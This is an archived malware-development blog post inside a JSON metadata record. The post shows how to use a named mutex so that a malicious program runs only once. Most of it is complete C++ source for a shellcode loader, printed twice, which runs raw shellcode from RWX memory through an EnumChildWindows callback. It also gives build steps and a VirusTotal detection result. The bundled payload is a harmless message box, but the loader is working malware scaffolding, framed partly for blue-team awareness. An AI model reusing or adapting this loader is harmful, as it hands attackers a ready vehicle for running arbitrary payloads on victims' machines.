{
	"id": "4a786f44-54f4-47b4-8559-f2600d5b0a61",
	"created_at": "2026-04-06T00:14:15.34122Z",
	"updated_at": "2026-04-10T13:12:13.224324Z",
	"deleted_at": null,
	"sha1_hash": "a978c0871cb9d8624936c61edcd39a29c0fa09f7",
	"title": "Malware development tricks: part 26. Mutex. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 978214,
	"plain_text": "Malware development tricks: part 26. Mutex. C++ example.\r\nBy cocomelonc\r\nPublished: 2023-01-04 · Archived: 2026-04-05 22:46:17 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my own research into the malware dev trick: prevent self-execution via mutexes.\r\nSometimes, when developing malware, for maximum stealth, it is necessary that the program be launched only\r\nonce. To do this, according to the MSDN documentation, we can use mutexes.\r\nmutexPermalink\r\nFor simplicity, we can use CreateMutexA function from Windows API:\r\nHANDLE CreateMutexA(\r\n LPSECURITY_ATTRIBUTES lpMutexAttributes,\r\n BOOL bInitialOwner,\r\nhttps://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\nPage 1 of 9\n\nLPCSTR lpName\r\n);\r\npractical examplePermalink\r\nIn the simplest implementation, you can use this function in this way:\r\ncreate mutex with specific name, so multiple instances can detect it:\r\nhMutex = CreateMutexA(NULL, FALSE, \"MeowMeowMutex\");\r\ncheck if mutex already exists, exit from app:\r\nif (GetLastError() == ERROR_ALREADY_EXISTS) {\r\n // if this process created the mutex, exit the application\r\n if (hMutex \u0026\u0026 GetLastError() == ERROR_ALREADY_EXISTS) {\r\n CloseHandle(hMutex);\r\n return 0;\r\n }\r\n}\r\notherwise, run malicious logic and close the mutex when done:\r\n//...\r\n// malicious logic\r\nLPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\nRtlMoveMemory(mem, my_payload, sizeof(my_payload));\r\nEnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);\r\n//...\r\n// cleanup\r\nif (hMutex)\r\n CloseHandle(hMutex);\r\nreturn 0;\r\nSo, full source code is looks like:\r\n/*\r\n * hack.cpp - Create mutex, run shellcode. 
C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n 
\"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main(int argc, char* argv[]) {\r\n HANDLE hMutex;\r\n // create mutex with a name so multiple instances can detect it\r\n hMutex = CreateMutexA(NULL, FALSE, \"MeowMeowMutex\");\r\n // check if the mutex already exists\r\n if (GetLastError() == ERROR_ALREADY_EXISTS) {\r\n // another instance already created the mutex, so exit the application\r\n if (hMutex \u0026\u0026 GetLastError() == ERROR_ALREADY_EXISTS) {\r\n CloseHandle(hMutex);\r\n return 0;\r\n }\r\n }\r\n // shellcode running logic\r\n LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n RtlMoveMemory(mem, my_payload, sizeof(my_payload));\r\n EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);\r\n // cleanup\r\n if (hMutex)\r\n CloseHandle(hMutex);\r\n return 0;\r\n}\r\nAs you can see, I run the shellcode via EnumChildWindows. Also, as usual, I use the meow-meow\r\nmessagebox payload.\r\ndemo\r\nLet’s see everything in action. Compile our “malware”:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-se\r\nThen, move it to the victim’s machine (in my case Windows 10 x64) and run:\r\n.\\hack.exe\r\nThen, try to run this “malware” again from another PowerShell terminal:\r\nAs you can see, nothing started; we only have one messagebox.\r\nTo check correctness, we can add a print statement to our code:\r\n/*\r\n * hack.cpp - Create mutex, run shellcode. 
C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003ccstdio\u003e\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n 
\"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main(int argc, char* argv[]) {\r\n HANDLE hMutex;\r\n // create mutex with a name so multiple instances can detect it\r\n hMutex = CreateMutexA(NULL, FALSE, \"MeowMeowMutex\");\r\n // check if the mutex already exists\r\n if (GetLastError() == ERROR_ALREADY_EXISTS) {\r\n // another instance already created the mutex, so exit the application\r\n if (hMutex \u0026\u0026 GetLastError() == ERROR_ALREADY_EXISTS) {\r\n printf(\"MeowMeowMutex already exists, app already running =^..^=\\n\");\r\n CloseHandle(hMutex);\r\n return 0;\r\n }\r\n }\r\n // shellcode running logic\r\n LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n RtlMoveMemory(mem, my_payload, sizeof(my_payload));\r\n EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);\r\n // cleanup\r\n if (hMutex)\r\n CloseHandle(hMutex);\r\n return 0;\r\n}\r\nThen, repeat our steps again:\r\nAs you can see, everything worked perfectly!\r\nLet’s upload hack.exe to VirusTotal:\r\nSo, 17 of 62 AV engines detect our file as malicious.\r\nhttps://www.virustotal.com/gui/file/153d249063f46b0d56603d7aab7e43a3361d74e9852367d8730f5e57fb9f5b9f/details\r\nThis trick is used, for example, by Conti ransomware, Hellokitty ransomware and AsyncRAT in the wild.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers’ arsenal.\r\nConti\r\nHellokitty\r\nHellokitty source code\r\nAsyncRAT source code\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and goodbye!\r\nPS. 
All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html"
	],
	"report_names": [
		"malware-tricks-26.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a978c0871cb9d8624936c61edcd39a29c0fa09f7.pdf",
		"text": "https://archive.orkl.eu/a978c0871cb9d8624936c61edcd39a29c0fa09f7.txt",
		"img": "https://archive.orkl.eu/a978c0871cb9d8624936c61edcd39a29c0fa09f7.jpg"
	}
}